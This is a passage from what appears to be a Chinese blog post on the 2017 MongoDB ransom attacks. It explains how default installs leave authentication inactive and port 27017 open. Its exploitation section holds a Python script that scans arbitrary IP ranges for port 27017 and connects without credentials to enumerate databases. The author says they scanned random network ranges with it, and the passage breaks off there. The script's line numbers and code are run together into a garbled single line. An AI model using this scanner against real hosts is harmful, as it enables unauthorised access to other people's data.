截止本周三(1月11日),已经有20名以上的黑客加入到这场对MongoDB用户一边倒的碾压中来,遭到入侵、勒索的数据库超过了33,000个,并且这一数字还在不断上升中。(源自凯捷咨询的Niall Merrigan提供的数据)MongoDB是目前包括eBay,纽约时报,LinkedIn在内的全世界多家公司广泛采用的数据库。
0X00 缘由
上周各漏洞平台爆出大量Mongodb数据库被入侵,他们通过删除数据勒索用户。这种入侵就发生在我身边,一学长的Mongodb总是莫名奇妙的少数据,通过排查原来是Mongodb有问题。
0X01 漏洞原因
在刚安装完毕的时候MongoDB都默认有一个admin数据库,此时admin数据库是空的,没有记录权限相关的信息!当admin.system.users一个用户都没有时,即使mongod启动时添加了–auth参数,如果没有在admin数据库中添加用户,此时不进行任何认证还是可以做任何操作(不管是否是以–auth 参数启动),直到在admin.system.users中添加了一个用户。加固的核心是只有在admin.system.users中添加用户之后,mongodb的认证,授权服务才能生效,同时新安装的Mongodb会把27017暴露到公网上,也让攻击者有机可乘。
0x02 漏洞利用
漏洞扫描脚本:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051 import socketimport sysimport pymongo'''hint:python mongodb.py startIP endIp'''ipcons = []def Scanner(ip):global ipconssk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sk.settimeout(0.3)try:sk.connect((ip,27017))ipcons.append(ip)sk.close()except Exception:passdef ip2num(ip):ip=[int(x) for x in ip.split('.')]return ip[0] <<24 | ip[1]<<16 | ip[2]<<8 |ip[3]def num2ip(num):return '%s.%s.%s.%s' %( (num & 0xff000000) >>24,(num & 0x00ff0000) >>16,(num & 0x0000ff00) >>8,num & 0x000000ff )def get_ip(ip):start,end = [ip2num(x) for x in ip.split(' ') ]return [ num2ip(num) for num in range(start,end+1) if num & 0xff ]startIp = sys.argv[1]endIp = sys.argv[2]iplist = get_ip(sys.argv[1]+" "+sys.argv[2])for i in iplist:Scanner(i)def connMon(ip_addr):print ' Connect mongodb: ' + ip_addr + ':27017'try:conn = pymongo.MongoClient(ip_addr,27017,socketTimeoutMS=3000)dbname = conn.database_names()print "success"except Exception as e:print "error"print ipconsfor ipaddr in ipcons:connMon(ipaddr)print "================="
随便扫了几个网段: